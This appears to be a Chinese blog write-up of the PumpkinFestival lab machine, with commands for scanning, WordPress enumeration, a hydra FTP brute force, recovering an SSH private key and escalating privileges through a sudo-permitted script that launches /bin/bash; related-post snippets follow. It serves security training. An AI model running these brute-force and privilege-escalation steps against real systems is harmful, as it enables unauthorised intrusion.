PumpkinFestival靶机复现

于 2024-08-13 20:24:40 发布
阅读量515 收藏 7
点赞数 13
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/141172963
版权

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机ip为192.168.112.145

目录扫描

dirsearch 192.168.112.145

访问浏览器(第一个token值)

查看源码,发现一串token值

PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52

目录拼接(第二、三、四个token值)

拼接/robots.txt(第二个token值)

拼接/wordpress/

拼接/tokens/(第二个token值)

发现被拒绝

拼接token.txt

发现第二个token值

PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea

拼接/users/

拼接/store/track.txt

发现需要绑定hosts文件

192.168.112.145 pumpkins.local

拼接 pumpkins.local(第三、四个token值)

发现第三个token值

PumpkinToken : 06c3eb12ef2389e2752335beccfb2080

拼接/license.txt(第四个token值)

发现第四个token值

PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71

后台登陆(第五、六个token值)

wpscan --url http://pumpkins.local -e at -e ap -e u

扫描出两个用户

admin

morse

还发现了一个readme.html

发现了一串base62编码

K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s

解密后得到

morse & jack : Ug0t!TrIpyJ

访问http://pumpkins.local/wp-login.php登陆

登陆成功

发现第四个token值

PumpkinToken : 7139e925fd43618653e51f820bc6201b

之前发现的一个值Alohomora!可能是admin账号的密码

尝试登陆

登录成功

发现了第五个token值

PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4

ftp登陆(第七、八、九个token值)

尝试匿名登陆

登陆成功

发现secret中有一个token.txt文件

下载
get token.txt

发现第六个token值

PumpkinToken : 2d6dbbae84d724409606eddd9dd71265

使用hydra破解harry用户的密码

hydra -l harry -P rockyou.txt 192.168.112.145 ftp -e nsr

账号:harry

密码:yrrah

ftp再次登录

登陆成功

发现token.txt文件

下载

get token.txt

查看文件

发现第七个token值

PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e

便利Donotopen目录

发现token.txt文件

发现第八个token值

PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c

getshell

进入和token.txt同级的目录中继续遍历,发现了一个data.txt文件

下载下来

查看发现是乱码

查看类型发现是tar压缩包

tar vxf data.txt

tar xjf data

tar vxf key

cat jack

发现为16进制文件

使用 xxd 将 hexdump 转换,得到一个私钥

xxd -r -p jack

chmod 600 aaa

ssh -i aaa jack@192.168.112.145 -p 6880

拿到shell

提权(第十个token值)

查看目录,发现一个token乱码文件

./token

得到第十个token值

8d66ef0055b43d80c34917ec6c75f706

sudo -l查看免密操作

mkdir pumpkins

cd pumpkins

vi alohomora

/bin/bash

chmod 777 alohomora

sudo ./alohomora

提权成功

CcHKer
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
脏牛提权(靶机复现
tubug的博客
03-26 2326
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
IMF靶机复现
weixin_43999483的博客
02-23 398
IMF靶机复现 发现靶机IP:192.168.8.198 搜寻开放端口,发现除了80端口外,没发现其他端口。 使用dirb 撞靶机的子域名 dirb http://192.168.8.198 并没有找到有用的域名 F12手动查找Flag 在contact.php中找到注释的Flag1 搜寻== 发现后三行乱码 疑似Flag,组合base64解码得到 对flag2的内容进行再解码,得到 : 可能是用户名密码或者是子域名,猜测得到网址192.168.8.198/imfadministrator
DC-1靶机复现
weixin_43980115的博客
03-21 1503
下载安装DC-1,并启动DC-1 下载地址:https://www.five86.com/downloads/DC-1.zip 下载完解压后会有一个以.ova为后缀的文件,直接在VM种用”打开虚拟机”,在设置中修改网络适配器为NET模式。 在这里记一下DC-1的MAC地址,等下用的到。 启动DC-1时开机就好,不用输用户名和密码登录(你也不知道呀) 打开kali,查看kali的IP地址和子网掩码 因为DC-1和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得DC-1的网络号
Tomato靶机复现过程
weixin_67729650的博客
08-04 972
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
DC-2靶机复现(自己渗透的记录)
hqhhhh的博客
02-20 905
环境搭建参考我的DC-1靶机搭建的方法,靶机的下载同样也在VulnHub中能找到。安装与环境的配置同样跟DC-1完全一直,只需要修改网络连接方式为NAT,使其与你的攻击机处于同一局域网内即可。
靶机练习-DC-4靶机复现
m0_63755076的博客
09-21 1063
hydra -l jim -P /root/桌面/pass ssh://192.168.用的darkweb2017-top10000.txt,爆破出来密码是happy。发现有charles,jim和sam可以登录,查看三个账户的家目录。发现46996.sh脚本可以提权,将其发送到DC-4中。发现开放了22和80端口,访问80端口。2.使用nmap扫描靶机开放的端口(发现有exim4命令,可以提权。执行46996.sh文件。
FUNBOX: SCRIPTKIDDIE靶机复现
m0_72372037的博客
10-17 164
然后对其网站进行一个详细的信息扫描。这里需要设置一下靶机的ip。设置一下kali的ip。这里发现ftp版本号。然后对其漏洞进行利用。
红队靶机之jarbas靶机复现,反弹sehll提权,用定时任务来提升至root用户
m0_58116751的博客
05-15 1937
发现靶机IP为192.168.38.134 开放了22,3306,80,8080我们可以进行的远程连接 找他web服务的漏洞,数据库如果能搜寻到泄露的信息也可以进行渗透,80端口有限级较高我们先测试他的web服务,在看下他的8080端口有个登录页面。我们显示发现了他可植入的初始shell在渗透过程中发现了他的权限并不够那我们就要思维拓宽来看他的一些用户,进程,和启动项想办法移动到其它账号之中。我们用cat /etc/crontab来查看他的一个定时任务,他有一个5分钟执行一次的脚本我们来查看他。
Player-v1.1靶机复现
qizuo2048的博客
07-12 283
Player-v1.1靶机复现文章(仅到getshell)
靶机练习:DC-1靶机复现
m0_63755076的博客
09-02 1733
发现了三个端口,80、22和111三个端口。80和22端口可以进行攻击,111端口一般是rpcbind漏洞(该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。发现密码是进过加密的,重置密码,可利/scripts/password-hash.sh脚本进行生成新密码。发现flag,该服务器开放了22端口,可以用hydra工具进行爆破。mysql正在运行,用刚才发现的密码进入数据库。
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
永恒之蓝复现kaliwin7
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
PWN靶机环境 网络安全
05-23
PWN靶机环境
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
聚类算法-一种无监督学习方法.docx
最新发布
08-12
聚类算法是一种无监督学习方法,用于将数据集中的数据点自动分组到不同的类别中,这些类别也称为“簇”或“群”。聚类的目标是让同一簇内的数据点尽可能相似,而不同簇之间的数据点尽可能不相似。聚类算法广泛应用于多种领域,如数据挖掘、模式识别、图像分析、信息检索等。 聚类算法的基本概念 无监督学习:聚类算法不需要事先标记数据点的类别标签,而是根据数据本身的相似性来分组。 相似性度量:聚类算法依赖于某种相似性或距离度量来决定数据点之间的相似程度。常用的度量包括欧氏距离、曼哈顿距离等。 目标函数:大多数聚类算法都会尝试最小化某种目标函数,例如簇内的平方误差和(SSE)。 常见的聚类算法 K-Means K-Means 是一种原型聚类算法,它通过迭代地将数据点分配到最近的质心来形成簇,并重新计算每个簇的质心,直到质心不再显著变化为止。 在 Python 的 scikit-learn 库中,可以通过 KMeans 类实现 K-Means 聚类。 层次聚类 层次聚类构建一个树状图(称为树状图或 dendrogram),显示数据点是如何逐渐合并成簇的。 这种算法可以是凝聚型(自底向上)或分裂型(自顶向下)。
45ft集装箱模型3D图纸 STEP格式.zip
08-12
45ft集装箱模型3D图纸 STEP格式.zip
Spring Boot网吧管理系统.zip
08-12
该系统严格按照需求分析制作相关模块,并利用所学知识尽力完成,但是本人由于学识浅薄,无法真正做到让该程序可以投入市场使用,仅仅简单实现部分功能,希望日后还能改善。 本系统具有以下优点: 该系统具有较高的适用性,选用B/S结构,可以在绝大部分个人平台上使用该系统。 系统将用户权限进行划分,管理员,网管和会员都能看到及操作的信息不一样,三者具备不同的操作权限。 该系统操作界面简单明了,大部分人都可以正常使用。 但也存在以下问题需要改进: 运行时窗口不能被刷新,可以改进。 系统过于简单,显示的信息有限。。 不能添加多个管理员账号,如果可以则将利于发展网吧规模,便于网吧信息集中管理。 不能实时预约接待消息和网吧反馈建议,容易被忽视,不利于管理员服务客户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值